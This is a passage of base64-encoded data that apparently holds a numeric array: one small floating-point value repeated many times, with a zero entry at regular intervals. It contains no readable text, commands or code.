tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8t